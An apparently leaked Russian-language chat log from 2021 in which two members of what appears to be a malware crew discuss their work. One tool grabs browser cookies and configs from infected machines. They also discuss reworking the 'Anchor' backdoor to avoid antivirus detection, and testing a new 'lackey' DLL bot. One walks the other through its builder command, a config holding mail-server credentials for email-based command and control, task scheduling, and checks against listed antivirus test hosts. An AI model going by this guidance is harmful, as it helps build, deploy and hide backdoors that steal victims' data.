[30.07.21 09:52:24] angelo:		привет старший брат !
[30.07.21 09:52:36] brooks:		:)
[30.07.21 09:52:52] angelo:		как дела у тебя ?
[30.07.21 09:53:17] brooks:		в полосочку - темную и светлую,  ща переходный период, а с какой на какую пока не пойму
[30.07.21 09:53:32] angelo:		а темного то чего ?
[30.07.21 09:53:50] angelo:		хотя тож чет не ахти
[30.07.21 09:54:25] brooks:		Встречаются два приятеля.
- Как дела?
- Ты знаешь, все так плохо, жена ушла, с работы выгнали, дача сгорела.
Приятель утешает:
- Не переживай. Жизнь, она как зебра полосатая, полоса белая, полоса черная.
Проходит время. Встречаются снова.
- Как дела?
- Помнишь, ты мне рассказывал про полосы?
- Да, конечно.
- Так то была белая полоса.
[30.07.21 09:54:39] angelo:		ахахаха))
[30.07.21 09:54:43] angelo:		ну да
[30.07.21 09:54:44] angelo:		да не
[30.07.21 09:54:59] angelo:		надо пнимать одно - всегда могло быть хуже
[30.07.21 09:55:03] brooks:		поэтому я и не могу сказать, с какой на какую
[30.07.21 09:55:30] angelo:		идешь такой весь в печали, встречаешь знакомого, а у него нет ног
[30.07.21 09:55:44] angelo:		и такой веселый, легкий, что прям ствновиться стыдно
[30.07.21 09:56:02] brooks:		Приходит Абрам к ребе:
– Ребе, у меня всё так плохо: дочь проститутка, сын наркоман, жена от меня ушла, с работы уволили. Шо мне делать?
– Значит так... Э-э... Напиши на листе бумаги "Так будет не всегда", повесь листок над кроватью и читай каждое утро.
Прошло полгода. Приходит он опять к ребе.
— Ребе, спасибо! У меня всё наладилось: дочь вышла замуж, сын вылечился, жена вернулась, а у меня успешный бизнес!
— Вот и славно! А скажи, листочек-то ещё висит?
— Конечно, ребе!
— Ну и хорошо. Не снимай!
https://ruanekdot.ru
[30.07.21 09:56:02] angelo:		у тебя ж ноги/руки есть ?
[30.07.21 09:56:48] angelo:		ничего себе я жираф
[30.07.21 09:56:52] angelo:		не понял (
[30.07.21 09:57:05] brooks:		ну я жевать не буду :)
[30.07.21 09:57:13] angelo:		не жуй
[30.07.21 09:57:20] angelo:		ты давай не это
[30.07.21 09:57:23] angelo:		не падай духом
[30.07.21 09:57:29] angelo:		уверен что нет причин
[30.07.21 09:57:32] brooks:		как скажешь
[30.07.21 09:57:39] brooks:		импортдлл ты тестируешь?
[30.07.21 09:57:45] angelo:		не-а
[30.07.21 09:57:47] angelo:		но готов
[30.07.21 09:57:48] angelo:		надо ?
[30.07.21 09:57:56] brooks:		не, уже кто-то есть
[30.07.21 09:57:57] angelo:		а то у нас там Супербраузер брахлит
[30.07.21 09:58:01] angelo:		и хрен его знает почему
[30.07.21 09:58:17] brooks:		ну там тысячи причин может быть
[30.07.21 09:58:21] angelo:		куки видать не все грабяться
[30.07.21 09:58:36] angelo:		юзера не узнает
[30.07.21 09:58:45] angelo:		может конфиги не все грабятся
[30.07.21 09:58:45] brooks:		это плохо
[30.07.21 09:59:00] brooks:		а если на тестовых машинах - тоже самое?
[30.07.21 09:59:08] angelo:		и да, конфиги грабяться через жопу (
[30.07.21 09:59:15] angelo:		да тож самое
[30.07.21 09:59:34] angelo:		это всё импорт так ?
[30.07.21 09:59:39] brooks:		ну ща посмотрят эти изменения, потом еще поисправляем
[30.07.21 09:59:59] brooks:		это юзеры мешают, держат браузеры открытыми
[30.07.21 10:00:25] angelo:		хм, интересное предположение
[30.07.21 10:00:30] angelo:		но так по всем ботам
[30.07.21 10:00:43] angelo:		надо этот импорт добить (
[30.07.21 10:00:49] brooks:		ну я комп не выключаю месяцами, и браузер никогда не закрываю
[30.07.21 10:01:03] angelo:		это вы, айтишники
[30.07.21 10:01:10] angelo:		мы люди выключаем
[30.07.21 10:01:38] brooks:		```
это вы, айтишники
``` 
мне гордиться или обидеться?
[30.07.21 10:01:51] angelo:		думаю гордиться
[30.07.21 10:02:01] angelo:		я ж тоже хочу быть как вы
[30.07.21 10:02:06] angelo:		но увы
[30.07.21 10:05:47] angelo:		когда зальешь новый инпорт ?
[30.07.21 10:22:38] brooks:		если хочешь, то могу тебе залить, посмотреть
[30.07.21 10:23:00] angelo:		Юджину заливай )
[30.07.21 10:23:01] brooks:		просто обсуждали, что он иногда может зависнуть на каком-либо браузере и больше ничего не собирает
[30.07.21 10:23:07] angelo:		Хамер сказал он тестит
[30.07.21 10:23:10] brooks:		поэтому сбор развели по тредам
[30.07.21 10:23:15] brooks:		посмотрим, что получилось
[30.07.21 10:23:15] angelo:		треды ?
[30.07.21 10:23:32] brooks:		ща хаммеру скину
[30.07.21 10:23:35] angelo:		окай
[30.07.21 10:23:43] angelo:		молодец, спасибо за старания
[30.07.21 10:23:50] angelo:		меня клиенты уже вытрахали
[30.07.21 10:24:15] brooks:		```
молодец, спасибо за старания
``` 
лучше денежку подкинь, ща номер кошелька скину
[30.07.21 10:24:34] angelo:		вот не стыдно у тестера денюшку клянчить ?
[30.07.21 10:24:47] angelo:		я беднее тебя минимум в два раза (
[30.07.21 10:25:07] brooks:		ты сам инициативу предложил, я поддержал :)
[30.07.21 10:25:30] angelo:		а я лишь хотел похвалить
[30.07.21 10:25:43] angelo:		хорошо когда хоть кто-то старается
[30.07.21 10:25:51] brooks:		ну так и иди до конца, премируй :)
[30.07.21 10:52:58] angelo:		сделай хорошо, я смогу лишь отписатсья Францу и сказать что ты умница
[30.07.21 10:59:28] brooks:		на забудь :)
[30.07.21 10:59:44] brooks:		нам денежку сегодня дадут или в понедельник?
[30.07.21 10:59:54] angelo:		в пн наверно
[30.07.21 11:00:01] brooks:		:(
[30.07.21 11:10:50] angelo:		умей копить
[30.07.21 11:10:55] angelo:		тогда будет приятнее и проще
[02.08.21 09:37:11] angelo:		привет !
[02.08.21 09:37:14] angelo:		за получил ?
[02.08.21 09:38:38] angelo:		зп *
[02.08.21 09:56:18] brooks:		привет, почти, перевели, а в фиатные еще не превратились
[02.08.21 11:56:37] angelo:		ну хоть перевели )
[03.08.21 16:23:35] angelo:		Привет
[03.08.21 16:23:45] angelo:		я уже спршивал миллион раз
[03.08.21 16:23:48] brooks:		:)
[03.08.21 16:23:48] angelo:		но спрошу ещё
[03.08.21 16:23:56] angelo:		как думаешь какие сроки у Импорта ?
[03.08.21 16:24:05] brooks:		не знаю
[03.08.21 16:24:17] angelo:		без него Супербраузер не пашет (
[03.08.21 16:24:42] brooks:		я ща соберу версию, чтобы работала под отладчиком и найду, где проблема
[03.08.21 16:25:31] brooks:		если сегодня соберу,  завтра на отладчике гляну
[03.08.21 16:26:17] angelo:		ок
[03.08.21 16:26:21] angelo:		его очень ждут
[03.08.21 16:26:31] angelo:		как комунисты Сталина
[03.08.21 16:26:39] angelo:		как христиане Иисуса
[04.08.21 12:23:05] angelo:		привет!
[04.08.21 12:23:08] angelo:		я снова к тебе
[04.08.21 12:23:22] brooks:		привет
[04.08.21 12:23:23] angelo:		просто интересуюсь как там новая сборка
[04.08.21 12:23:25] angelo:		?
[04.08.21 12:23:32] brooks:		сборка чего?
[04.08.21 12:23:35] angelo:		мне тут напоминают - и я к тебе бегу )
[04.08.21 12:23:38] angelo:		импорта
[04.08.21 12:24:48] brooks:		значит так - тестовая сборка у меня вроде как собирает, убрал некоторые ошибки, параллельно со мной цезарь делал свои правки, ща оба варианта кода есть у него и у меня, как позеленеет, решим, кто сведет код и выдадим на проверку
[04.08.21 12:25:56] angelo:		отлично !
[04.08.21 12:26:06] angelo:		молодчина !
[04.08.21 12:26:15] brooks:		подожди, надо сначала проверить
[04.08.21 12:26:27] brooks:		то, что работает у меня, еще не значит, что будет работать на тестовых
[04.08.21 12:30:59] angelo:		ждём
[04.08.21 12:31:02] angelo:		там вообще ждут как ману небесную
[04.08.21 12:31:15] brooks:		дайте цезарю покушать
[04.08.21 12:31:40] angelo:		ок, даже писать не буду
[12.08.21 13:18:32] angelo:		привет дружище !
[12.08.21 13:18:41] angelo:		посмотришь дебаглог импорта ?
[12.08.21 13:22:30] brooks:		привет
[12.08.21 13:22:35] brooks:		а что я в нем увижу?
[12.08.21 13:22:47] brooks:		смотрите собранные данные
[12.08.21 13:23:25] brooks:		хотя кинь
[12.08.21 13:23:39] angelo:		ща
[12.08.21 13:23:41] angelo:		пару мин
[12.08.21 13:31:19] angelo:		ydstehsdm6uew35syuio9oytrs6rdygyuij
[12.08.21 13:33:04] angelo:		https://send.exploit.in/download/3e86f355f1fa8a1e/#-3zSs4szTYxt0iSQ2Xet0g
[03.09.21 08:06:34] angelo:		привет мой старый друг !!!
[03.09.21 08:06:42] angelo:		снова нужна твоя помощь по старому делу
[03.09.21 08:06:44] angelo:		анкору
[06.09.21 11:00:12] angelo:		давай сам
[06.09.21 11:00:16] angelo:		занимайся делами
[06.09.21 11:00:23] angelo:		я сам
[06.09.21 11:00:28] brooks:		ок
[06.09.21 11:01:35] angelo:		поймал архив
[21.09.21 10:33:05] angelo:		Привет дорогой мой друг !
[21.09.21 10:33:17] brooks:		:)
[21.09.21 10:33:21] angelo:		как будет возможность написать - напиши как там по анкору
[21.09.21 10:34:22] brooks:		хотел в выходные закончить лайт версию, немного не успел, доделываю некоторые требования, как закончу - думаю за 3-4 дня сделаю полную версию
[21.09.21 10:34:43] angelo:		ага, а по поводу детектов ?
[21.09.21 10:34:49] angelo:		решилось ?
[21.09.21 10:35:06] brooks:		оптимистичный прогноз на этой неделе, плохой - очень хотелось бы закрыть вопрос до конца следующей
[21.09.21 10:35:28] brooks:		по детектам - код  будет новый, почти непохожий на предыдущий, надеюсь что детектов не будет
[21.09.21 10:35:44] angelo:		супер !
[21.09.21 10:35:49] angelo:		ты такой молчина !
[21.09.21 10:36:15] brooks:		супер когда сделаю, а пока это только пожелания и хотелки
[21.09.21 10:36:52] angelo:		всё начинается с желать и хотеть
[24.09.21 14:59:47] angelo:		привет дорогой
[24.09.21 14:59:52] angelo:		ну как ?
[24.09.21 14:59:57] angelo:		вышло чего путного ?
[24.09.21 15:00:16] brooks:		привет, почти, думаю в понедельник отдам на проверку
[24.09.21 15:00:28] angelo:		окай, понял тебя и принял
[24.09.21 15:00:36] angelo:		а кто его проверять будет ?
[24.09.21 15:00:42] brooks:		ща запущу линксовую часть и проверю, что работает вся цепочка, потом тебе
[24.09.21 15:00:50] brooks:		ты :)
[24.09.21 15:01:33] angelo:		ахахах ))
[24.09.21 15:01:38] angelo:		я буду очень рад )
[24.09.21 15:01:39] angelo:		честно
[24.09.21 15:01:44] angelo:		ностальгия пярм
[24.09.21 15:02:20] brooks:		давай до понедельника, мне чуть-чуть осталось, ща хелп добавлю, да еще одну мелочь надо исправить, и усё
[24.09.21 15:02:32] brooks:		всё, не отвлекай, я пошел доделывать
[24.09.21 15:02:39] angelo:		давай
[24.09.21 15:02:41] angelo:		удчки
[27.09.21 14:56:11] brooks:		привет, про то что обещал помню, у меня проблема на стороне админки, рокко сегодня нет, его ребята обещали завтра помочь
[27.09.21 15:08:13] angelo:		понял тебя
[27.09.21 15:08:13] angelo:		привет родной
[27.09.21 15:08:13] angelo:		окай
[27.09.21 15:08:17] angelo:		ждем до завтра
[27.09.21 15:08:18] angelo:		норм
[29.09.21 08:07:36] brooks:		привет
[29.09.21 08:08:14] angelo:		привет дорогой
[29.09.21 08:08:25] brooks:		готов тестировать?
[29.09.21 08:08:39] angelo:		как пионер
[29.09.21 08:08:50] brooks:		минут через 10 скину
[29.09.21 08:16:15] brooks:		https://gofile.io/d/68P8u3
[29.09.21 08:16:23] brooks:		ща  еще скину указания
[29.09.21 08:18:39] angelo:		парольку ещё не забудь скинуть на архив
[29.09.21 08:18:56] brooks:		там нет
[29.09.21 08:20:11] angelo:		качается файл, открываю Клеопатрой и там архив 0rar
[29.09.21 08:20:16] angelo:		прсоит пароль
[29.09.21 08:20:20] angelo:		я дурак ?(
[29.09.21 08:20:23] brooks:		попробуй 1
[29.09.21 08:20:37] angelo:		ага
[29.09.21 08:20:38] angelo:		есть
[29.09.21 08:20:44] brooks:		а что в архиве?
[29.09.21 08:20:59] brooks:		может я тебе не то кинул?
[29.09.21 08:21:10] angelo:		там весь анкор
[29.09.21 08:21:14] angelo:		все файлы
[29.09.21 08:21:15] angelo:		стандартно
[29.09.21 08:21:30] brooks:		значит не то
[29.09.21 08:23:32] brooks:		https://gofile.io/d/WdM7Vj
[29.09.21 08:23:42] brooks:		должны быть файлы lackey*
[29.09.21 08:23:51] brooks:		отойду на полчаса
[29.09.21 08:23:57] angelo:		окай
[29.09.21 08:43:12] brooks:		здесь
[29.09.21 08:43:27] angelo:		блин быстро ты
[29.09.21 08:43:32] angelo:		скачался файл 1
[29.09.21 08:43:35] angelo:		как открыть ?
[29.09.21 08:43:54] brooks:		переименуй его в 1.rar
[29.09.21 08:44:33] angelo:		пишет ошибку
[29.09.21 08:44:39] angelo:		говорит не измевстный формат
[29.09.21 08:44:42] angelo:		точно рар ?
[29.09.21 08:44:53] brooks:		1.rar.pgp
[29.09.21 08:45:16] brooks:		сначала дешифруешь своим ключем
[29.09.21 08:45:42] angelo:		есть
[29.09.21 08:45:53] angelo:		lackey
[29.09.21 08:47:05] angelo:		поэтому тестирование будет длинным и интересным.
[29.09.21 08:47:09] angelo:		ахахаха ))
[29.09.21 08:47:15] angelo:		люблю твой юмор
[29.09.21 08:57:49] angelo:		а проверяли на фермах ?
[29.09.21 08:57:59] angelo:		на детекты
[29.09.21 08:58:02] brooks:		нет, можешь - проверь
[29.09.21 08:58:53] brooks:		только не оригиналный, что  я прислал, а подготовленный
[29.09.21 08:59:26] brooks:		у меня конфиг для билдера выглядит так:
```
minpause=32
maxpause=128
mail={test@14740-27223.bacloud.info|CKFYQ25SMyli2STV|14740-27223.bacloud.info|14740-27223.bacloud.info}
mail={w-1@14740-27223.bacloud.info}

```
[29.09.21 09:24:08] brooks:		разобрался немного что и как?
[29.09.21 09:24:17] angelo:		эм не много
[29.09.21 09:24:18] angelo:		я кушаю если честно
[29.09.21 09:24:24] angelo:		ты пока тут будешь ?
[29.09.21 09:24:28] brooks:		приятного
[29.09.21 09:24:35] angelo:		ща суп доем и начну
[29.09.21 09:24:37] angelo:		спс
[29.09.21 09:24:40] brooks:		да, не торопись, еще подавишься не дай бог
[29.09.21 09:25:01] angelo:		вот теперь начну переживать чт омогу подавиться )))
[29.09.21 09:25:12] brooks:		:)
[29.09.21 09:39:12] angelo:		10 мин и у меня будут вопросы
[29.09.21 09:39:28] brooks:		ок
[29.09.21 09:39:33] brooks:		на ферме посмотрел?
[29.09.21 09:39:55] angelo:		на ферме смотреть это на часа 3-4 ))
[29.09.21 09:40:01] angelo:		ты видать фермы плохо знаешь наши
[29.09.21 09:40:08] angelo:		я кушал вообще-то
[29.09.21 09:40:13] angelo:		:expressionless:
[29.09.21 09:40:23] brooks:		я их совсем не знаю
[29.09.21 09:40:27] brooks:		поэтому и спросил
[29.09.21 10:23:05] angelo:		я тут туплю как всегда
[29.09.21 10:23:05] angelo:		слушай
[29.09.21 10:23:12] angelo:		а мыло
[29.09.21 10:23:27] angelo:		раньше не припомню что в работе анка использовался емейл
[29.09.21 10:23:30] angelo:		бррр
[29.09.21 10:23:39] brooks:		это другая прога
[29.09.21 10:26:05] angelo:		так для начала я запускаю lackey_x64.dll
[29.09.21 10:26:20] brooks:		для начала ты запускаешь билдер
[29.09.21 10:26:25] angelo:		lackeyBuilder*
[29.09.21 10:26:33] angelo:		угу
[29.09.21 10:26:46] brooks:		ну любой, вин или линух, что тебе ближе
[29.09.21 10:26:55] angelo:		так запустил
[29.09.21 10:27:14] angelo:		подсказку вижу
[29.09.21 10:27:18] angelo:		не просту подсказку
[29.09.21 10:27:54] angelo:		--conf=<configure file> --source=<source file> --target=<target file>
[29.09.21 10:28:15] angelo:		таргет понял, называем как угодно выходящий билд
[29.09.21 10:28:26] angelo:		соурс это lackey_x64.dll
[29.09.21 10:28:27] brooks:		да, сорс надеюсь тоже понял
[29.09.21 10:28:35] brooks:		а конф напишешь сам
[29.09.21 10:28:36] angelo:		а вот конфиг
[29.09.21 10:28:43] brooks:		образец содержимого там есть
[29.09.21 10:30:34] angelo:		сендту - прописываю w-1@14740-27223.bacloud.info:rGhzwna9Uz3gp6Hns22Y
[29.09.21 10:31:03] angelo:		mail={address@mailbox.com} тут тот который зарегаю
[29.09.21 10:31:13] angelo:		а вот чт описать в двух других не понял
[29.09.21 10:31:19] angelo:		mail={test@usa.com|myPwd|imap.usa.com|smtp.usa.com}
mail={test@australian.com|pwd12345|*imap.australian.com|*smtp.australian.com}
[29.09.21 10:31:23] brooks:		нет, sendto только адрес, без пароля
[29.09.21 10:31:35] angelo:		ну да
[29.09.21 10:31:56] brooks:		я тебе скинул свой конфиг
[29.09.21 10:42:01] angelo:		minpause=32
maxpause=128
mail={test@14740-27223.bacloud.info|CKFYQ25SMyli2STV|14740-27223.bacloud.info|14740-27223.bacloud.info}
mail={test@inbox.lv}
[29.09.21 10:42:16] angelo:		вот так в моем случае норм да ?
[29.09.21 10:42:18] brooks:		нет
[29.09.21 10:42:36] brooks:		сервер принимает данные на том адресе,  который прописан у меня
[29.09.21 10:42:38] angelo:		тааак, что-то я тупее обчного
[29.09.21 10:42:58] brooks:		а вот отправлять и принимать ты можешь на любом, либо как у меня, либо на своем
[29.09.21 10:44:56] angelo:		прости а что за данные ?
[29.09.21 10:45:04] angelo:		вот этот момент не ясен
[29.09.21 10:45:15] angelo:		то есть прописывается билд через сервер ?
[29.09.21 10:45:28] brooks:		ну программа же что-то отсылает на админку и принимает с нее, это и есть данные
[29.09.21 10:47:45] angelo:		все равно не понятно как правильно написать конфиг
[29.09.21 10:47:51] angelo:		ну вот бей меня тапками и палками
[29.09.21 10:48:06] brooks:		бери мой и используй :)
[29.09.21 10:48:15] angelo:		твой конфиг ?
[29.09.21 10:48:28] angelo:		minpause=32
maxpause=128
mail={test@14740-27223.bacloud.info|CKFYQ25SMyli2STV|14740-27223.bacloud.info|14740-27223.bacloud.info}
mail={w-1@14740-27223.bacloud.info}
[29.09.21 10:48:31] angelo:		всё беру
[29.09.21 10:48:32] brooks:		ты зарегил свой почтовый адрес?
[29.09.21 10:48:42] brooks:		измени эту строку:
[29.09.21 10:48:51] brooks:		mail={test@14740-27223.bacloud.info|CKFYQ25SMyli2STV|14740-27223.bacloud.info|14740-27223.bacloud.info}
[29.09.21 10:49:16] brooks:		только правильно пропиши наименования imap и smtp  серверов
[29.09.21 10:49:55] brooks:		для mail.com это будут imap.mail.com и smtp.mail.com, для твоего сервера - понятия не имею
[29.09.21 10:50:05] angelo:		polkabest12@inbox.lv
[29.09.21 10:50:08] angelo:		nfrjq djn
[29.09.21 10:50:08] brooks:		но можешь использовать и мой
[29.09.21 10:50:10] angelo:		такой вот
[29.09.21 10:50:32] angelo:		понял
[29.09.21 10:50:37] brooks:		посмотри, они должны предоставлять инфу, как у них называются сервера
[29.09.21 10:50:40] angelo:		вечно мне нужно разжевать
[29.09.21 10:50:52] brooks:		для образца можешь посмотрить  на яндексе или mail.ru
[29.09.21 10:51:00] angelo:		да я понял
[29.09.21 10:51:06] angelo:		как настривать клиент почтовый
[29.09.21 10:51:09] brooks:		запроси почтовые сервера yandex.ru
[29.09.21 10:51:21] brooks:		в смысле настраивать?
[29.09.21 10:51:46] angelo:		ну про имап и смтп
[29.09.21 10:52:06] brooks:		никак, мне нужны названия серверов, больше ничего
[29.09.21 10:52:12] brooks:		ты их и указываешь
[29.09.21 10:53:53] angelo:		собака
[29.09.21 10:53:59] angelo:		инбокс не дает сервера пока
[29.09.21 10:54:10] angelo:		не будет верификации по номеру телефона
[29.09.21 10:54:15] angelo:		давай пока на твоем
[29.09.21 10:54:19] brooks:		ок
[29.09.21 10:54:21] brooks:		пробуй
[29.09.21 10:56:28] angelo:		lackeyBuilder_x64.exe --conf=mats.txt --source=lackey_x64.dll --target=x63.dll
[29.09.21 10:56:34] angelo:		уот так вот да ?
[29.09.21 10:56:46] brooks:		ага
[29.09.21 10:57:35] angelo:		и собственно создается файл таргета для запуска на тачке и дальше работа из админки, да ?
[29.09.21 10:57:59] brooks:		дальше запускаешь файл, и он работает, вечно
[29.09.21 10:58:06] brooks:		ну и из админки ставишь задачи
[29.09.21 10:58:11] angelo:		угу
[29.09.21 10:58:17] brooks:		сначала посмотри, что есть отстук, а потом задачи
[29.09.21 10:58:35] angelo:		он в таске как будет отображаться ?
[29.09.21 10:58:46] brooks:		да, как rundll32
[29.09.21 11:00:17] brooks:		и поставь минимум 1 час и максимум 2 часа, между задачами будет пауза в этом диапазоне
[29.09.21 11:00:34] brooks:		если минимум поставить 0 - не знаю, что получится, но можно попробовать и пару 0-1
[29.09.21 11:00:57] brooks:		задача была поставлена на паузу 10 суток, поэтому и диапазон ставится в часах
[29.09.21 11:01:50] angelo:		а вот минимум и максимум
[29.09.21 11:01:58] angelo:		максимум это срок службы работы на машине
[29.09.21 11:02:03] brooks:		нет
[29.09.21 11:02:08] angelo:		а минимум
[29.09.21 11:02:23] brooks:		это пауза между двумя последовательными проверками наличия заданий в админке
[29.09.21 11:02:32] brooks:		выбирается случайным образом в заданном диапазоне
[29.09.21 11:02:50] angelo:		понял
[29.09.21 11:02:54] brooks:		у проги нет ограничения по сроку работы
[29.09.21 11:03:18] angelo:		то есть пауза на активность, бот спит и стучаит через то время что мы задали
[29.09.21 11:03:28] angelo:		не стучит, а забирает задачи с админки
[29.09.21 11:03:31] brooks:		да
[29.09.21 11:03:43] brooks:		задачи нельзя забрать без отстука
[29.09.21 11:04:03] brooks:		отстук действует один час, после этого надо снова стучать, иначе админка не отдаст задачу
[29.09.21 11:04:23] brooks:		т.е. перед каждой попыткой получить задание делается отстук
[29.09.21 11:04:26] brooks:		ну почти так
[29.09.21 11:04:40] brooks:		точне делается отстук и после этого выгребаются все задания
[29.09.21 11:05:02] angelo:		понятннько
[29.09.21 11:05:13] brooks:		но т.к. для получения каждого задания нужно не менее 5 минут, то ставить очередь более чем в 10 заданий не стоит
[29.09.21 11:05:21] brooks:		да и 10 много
[29.09.21 11:08:26] angelo:		ну стук есть
[29.09.21 11:08:39] brooks:		ставь задание
[29.09.21 11:08:48] angelo:		угу
[29.09.21 11:09:00] brooks:		должно быть  выполнено в заданный тобой дапазон + 10 минут
[29.09.21 11:09:44] angelo:		я поставил как ты сказал 1 и 2
[29.09.21 11:10:22] brooks:		ну вот, следущий отстук будет не ранее чем через час, и после него будет попытка получить задание и выполнить его
[29.09.21 11:10:35] brooks:		ставь задачу и можешь заниматься другими проблемами, ждем :)
[29.09.21 11:10:47] angelo:		ищу
[29.09.21 11:10:53] angelo:		свой редмиу по анкору
[29.09.21 11:11:00] angelo:		редмик
[29.09.21 11:11:27] brooks:		можешь сразу поставить 3-4 задачи, главное чтобыи х выполнение не мешало друг другу и можно было получить независимый результат
[29.09.21 11:19:54] brooks:		ты в ночь сможешь поставить проверку на ферме? или нужно присутствие?
[29.09.21 11:27:57] angelo:		если бы бро
[29.09.21 11:27:59] angelo:		все руками
[29.09.21 11:28:01] angelo:		физически
[29.09.21 11:28:19] angelo:		а ты сказал что нужно сборку проверять не эту
[29.09.21 11:28:23] angelo:		можно поподробнее
[29.09.21 11:28:56] angelo:		надо заливать на каждую машину файл и запускать руками
[29.09.21 11:29:36] angelo:		есть пример команд ?
[29.09.21 11:29:48] angelo:		я пока помню что инкод 0 создание файла
[29.09.21 11:40:02] brooks:		почему не эту?
[29.09.21 11:40:07] brooks:		эту проверяем
[29.09.21 11:40:15] brooks:		потом будет еще, другая
[29.09.21 11:40:28] brooks:		если эта нормально себя покажет - ее в работу
[29.09.21 11:41:13] angelo:		то есть этот билд запускаю на каждой ферме ?
[29.09.21 11:41:25] brooks:		https://privnote.com/40vdpQoc#tgUBnHAXf
[29.09.21 11:41:31] angelo:		Avast 162.244.82.215:31007
Sophos 162.244.82.215:31003
Forti 162.244.82.215:31013
McAfee 162.244.82.215:31005
Eset 162.244.82.215:31001
Trend Micro 162.244.82.215:31004  
BitDefender 162.244.82.215:31002
Symantec  162.244.82.215:31006
[29.09.21 11:41:37] brooks:		я понятия не имею, как работать с фермами
[29.09.21 11:41:46] brooks:		ну давай проверим, хуже не будет
[29.09.21 11:43:09] brooks:		команды 99 и 100 отсутстуют, т.к. прога должна висеть в памяти вечно
[29.09.21 11:45:51] angelo:		ну проверять надо до момента стука бота в админку да ?
[29.09.21 11:46:00] angelo:		и подождать какое-то вермя
[29.09.21 11:46:05] angelo:		для динамики
[29.09.21 11:46:35] brooks:		да как только ты запустишь ьпрогу - она будет стучать, лучше проверять на этом моменте
[29.09.21 11:46:38] angelo:		так по кодам, запустил я тока две команды, на создание файлов 0/9 инкоды....а вот другие хз как, у меня ж нечего запускать
[29.09.21 11:46:46] angelo:		понял
[29.09.21 11:47:14] brooks:		тебе надо найти тестовую нагрузку?
[29.09.21 11:47:23] angelo:		ну да
[29.09.21 11:47:30] angelo:		я ж не могу тока два инкода првоерить
[29.09.21 11:47:32] brooks:		ща посмотрю
[29.09.21 11:47:33] angelo:		хоть был бы рад
[29.09.21 11:47:36] angelo:		)
[29.09.21 11:47:52] brooks:		дело в том,  что код содран с анкора, и здесь сюрпризов не долнжо быть
[29.09.21 11:48:01] brooks:		но проверить надо, на всякий случай
[29.09.21 11:48:16] angelo:		ну хоть один инкод запщу с нагрузкой
[29.09.21 11:53:03] brooks:		https://gofile.io/d/ip9VHI
[29.09.21 11:57:52] angelo:		а когда мы делаем команду
[29.09.21 11:57:53] angelo:		testBurden_x64.exe --file=c:\testBurden\textEXE.txt
[29.09.21 11:58:18] angelo:		мы создаем папку тестбарден на диске с ?
[29.09.21 11:58:28] brooks:		это значит, что после запуска эта программа должна записывать этот лог файл
[29.09.21 11:58:33] brooks:		вроде бы я ее создаю
[29.09.21 11:58:40] brooks:		можешь вручную запустить и проверить
[29.09.21 11:58:55] angelo:		пусть отрабатывает команда
[29.09.21 16:18:11] angelo:		забыл я совсем что анекор не будет работать не с US
[29.09.21 16:18:23] angelo:		три раза запукал бота и команды не отрабатывались
[29.09.21 16:18:32] angelo:		примерил прокси US и отработало
[29.09.21 16:18:44] brooks:		в смысле US?
[29.09.21 16:19:12] brooks:		что такое US?
[29.09.21 16:19:15] angelo:		америка
[29.09.21 16:19:22] angelo:		Юнайтед Стейт
[29.09.21 16:19:29] angelo:		Ип
[29.09.21 16:19:36] brooks:		что значит не работает не с US?
[29.09.21 16:19:50] angelo:		короче получается там
[29.09.21 16:20:44] angelo:		что
[29.09.21 16:20:58] angelo:		бот когда запускался у меня был ип
[29.09.21 16:21:01] angelo:		Сербии что ли
[29.09.21 16:21:20] angelo:		хз почему, так как пишет ВПН что у меня US
[29.09.21 16:21:26] angelo:		команды не отрабатывались
[29.09.21 16:21:39] angelo:		врубил наш проски и команда отработалась
[29.09.21 16:22:20] brooks:		а вот этот момент я  не понял, как это может происходить
[29.09.21 16:22:32] angelo:		я сейчас еще попроверяю
[29.09.21 16:22:35] angelo:		на разных ипах
[29.09.21 16:22:39] angelo:		хорошо ?
[29.09.21 16:22:46] angelo:		не горит же ?
[29.09.21 16:22:49] brooks:		да, конечно, это неправильно
[29.09.21 16:22:54] brooks:		не, не горит
[29.09.21 16:23:17] angelo:		ну тогда поиграюсь ещё чутка а потмо на ферму заливать буду
[29.09.21 16:23:28] brooks:		ага
[29.09.21 16:23:32] angelo:		слушай, через фермы ничего не утечет ?
[29.09.21 16:23:40] angelo:		если будет МАЛО ЛИ детект
[29.09.21 16:23:45] brooks:		если мы до конца недели оттестимся - будет отлично
[29.09.21 16:24:16] brooks:		я не знаю,  я вообще на фермах никогда не был, я не настолько люблю коров и свиней
[29.09.21 16:24:24] angelo:		ну с моей стороны то всё быстро будет, самое затратное это фермы
[29.09.21 16:24:44] angelo:		а я люблю коров - просто их готовить надо хорошо уметь
[29.09.21 16:24:45] angelo:		свинина вредная
[29.09.21 16:24:58] brooks:		иудей или муслим?
[29.09.21 16:25:12] angelo:		похуист/атеист
[29.09.21 16:25:23] angelo:		но за здоровое питание !
[29.09.21 16:25:49] angelo:		почитал я твой редмик по командам и понял
[29.09.21 16:26:03] angelo:		понял что непроходимо туп
[29.09.21 16:26:13] brooks:		т.е. US не при чем?
[29.09.21 16:26:14] angelo:		ничерта не понятно и жутко сложно
[29.09.21 16:26:42] brooks:		да не сложно, просто я живу в задаче и мне все понятно, а ты со стороны сморишь
[29.09.21 16:26:47] angelo:		ну мне кажеться анкор имеет какой то стоп на Ипы
[29.09.21 16:27:07] brooks:		не должен
[29.09.21 16:27:22] brooks:		анкор работает поверх протокола днс, а этот через мыло
[29.09.21 16:27:31] brooks:		оттестим - я и анкор переведу на мыло
[29.09.21 16:27:46] angelo:		а как понять через мыло ?
[29.09.21 16:27:52] angelo:		вот в упор не понимаю
[29.09.21 16:28:12] angelo:		анкор работает напрямую с админкой
[29.09.21 16:28:21] angelo:		ну через прокладки как раньше
[29.09.21 16:28:39] angelo:		а теперь получается шлется инфа на мыло а с мыла на админку ?!
[29.09.21 16:28:54] brooks:		мыло - email
[29.09.21 16:29:03] angelo:		блин да это японял
[29.09.21 16:29:16] brooks:		т.е. обмен данными происходит с привлечением почтовых серверов через отпрвку писем
[29.09.21 16:29:38] angelo:		в шифрованном виде да ?
[29.09.21 16:29:50] angelo:		кстати а бот должен в админке показывать что он онлайн всё время ?
[29.09.21 16:30:09] brooks:		откуда здесь онлайн?
[29.09.21 16:30:19] angelo:		понл
[29.09.21 16:30:30] angelo:		я просто спросил
[29.09.21 16:30:46] angelo:		мы сами задаем переодичность его"просыпания"
[29.09.21 16:30:51] brooks:		онлайн - когда поддерживаем открытым канал связи
[29.09.21 16:30:55] brooks:		да
[29.09.21 16:31:03] brooks:		и то в диапазоне, случайным образом
[29.09.21 16:31:22] angelo:		ты такой умный
[29.09.21 16:31:29] angelo:		тебе череп не жмет  ?
